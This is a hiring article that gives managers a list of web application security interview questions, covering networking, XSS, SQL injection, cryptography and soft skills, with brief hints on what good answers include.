According to a survey, 85 percent of Singaporean Chief Information Officers (CIOs) believed that companies will suffer from cyber-attack more often than before – indicating the need for more IT security presence in the organisation. Yet, when hiring ones, hiring managers are often confused about where to start as there is a pool of talents claiming to own ninja-level expertise in the field yet not ready to create a robust security system.
Therefore, if you are a CEO looking to build security system or HR manager planning to develop a new web application but don’t know where to start, Synopsys suggested starting your search journey by asking open-ended and simple questions regarding IT security then going to more detailed questions.
See also: 6 Advices to Optimise Your Video Job Interview
So, are you hiring for ones now? If yes, here is a handy list of web application security interview questions that can help you start.
1. Question regarding basic website and IT
Starting by making sure that candidates understand how websites and applications work in general will give you insight into how promising your candidates are. Here is a question list to assess candidate’s understanding of the topics.
- Explain what happens when you enter “google.com” in a browser’s address bar! – This question should give insight on candidate’s understanding of DNS, DHCP, ARP, TCP and SSL/TLS handshakes, proxy, cookies, session management, HTTP methods, GET/POST, etc.
- Are you a Mac/Windows/Linus person? Which OS is more secure? – This is a tricky question as no OS is completely secure.
2. Question regarding network security questions
As you start with an open-ended question in general, now it is time to move to basic questions so you can understand candidate’s network security knowledge. Here is the list.
- How would you perform a network reconnaissance? – Here you should look for basic tools and network commands like Nmap or ping. Hint: you can use scenario for this question. For example, if you are a web administrator for HandlingMoreTrafficThanFacebook.com, how do you prevent a DDoS attack on the website?
3. Question regarding web application security questions
These are the core questions to ask. It gives you insight on candidate’s knowledge about common web-based attacks, including SQL injection, XSS, CSRF, remote file inclusion, etc. So, here are the questions you should consider asking.
- Which approach is better: a manual security test or an automated security test? – The answer would be it depends so the candidate must be able to compare the pros and cons of both and describe a balanced approach.
- What is the difference between white box and black box testing? Which one is better? – The answer depends on a host of factors such as cost, time, team’s requirements, and so on.
- How would you perform a security/penetration test on a web application covering three scenarios, namely unauthenticated test on the log-in page, authenticated tests with one user account, authenticated tests with multiple user accounts?
- Explain a DOM-based cross-site scripting attack.
- Is input validation sufficient to prevent cross-site scripting?
- Explain a blind SQL injection attack.
- How does a web application firewall (WAF) detect and prevent attacks?
- What is the difference between authentication and authorisation?
- What is same-origin policy? What is CORS (cross-origin resource sharing)?
Tips: software security is not limited to a web application. Therefore, you can ask the general application security questions such as architecture design, mobile security, source code review, reverse engineering, and malware analysis, as they relate to the position.
4. Question regarding web AppSec tools and practical knowledge
Although there is no practical list of tools, knowledge of some common ones will add much value to candidates. So, here goes the list.
- Have you taken part in a bug bounty or CTF contest?
- What is your favourite security tool and why?
- What is the most interesting vulnerability you’ve found? – You can play a scenario here. For instance, you have a log-in page with “username” and “password” fields. How do you test for SQL injection without using any tool?
5. Question about cryptography
Basic understanding of cryptography is a must-know for security professionals. Therefore, your candidates should know about common cryptography attacks and its prevention.
- What is the difference between encryption, encoding, and hashing? – Tips: it’s better if the candidate can explain with some example algorithms.
- What is the difference between asymmetric and symmetric cryptography?
- Why is the word “password” a bad password? – Here you can listen to concepts such as password crackers, rainbow tables, dictionary attacks, hashing, and salting.
- How does gmail.com ensure that some hacker on the internet is not reading my emails while Gmail pushes the emails out to me? – Listen for an explanation of SSL/TLS, man-in-the-middle attacks, and how to prevent them.
6. Question about soft skills
Here are a few sample questions you can ask about candidate’s soft skills from a technical perspective.
- What security podcasts/blogs/websites do you follow?
- Are you part of any local security group (OWASP chapters/meetup groups)?
- Tell me about a recent security breach that caught your attention and why.
- Explain [common security issue] to me like I’m five years old.
- How would you convince a senior executive to allocate budget for a security activity you think is necessary? – You can play scenario here such as if you’re an executive who has just been convinced by one of your security folks to secure an intranet-only web application, how much do you invest? – You can listen for concepts such as asset value, impact analysis, risk severity, and exposure that candidate is explaining to make sure they understand about risk management, policy and compliance, data breaches, and so forth.
- Should we prioritise business requirements over security requirements or vice versa?
Read also: 5 Important Interview Questions to Assess Candidate’s Potentials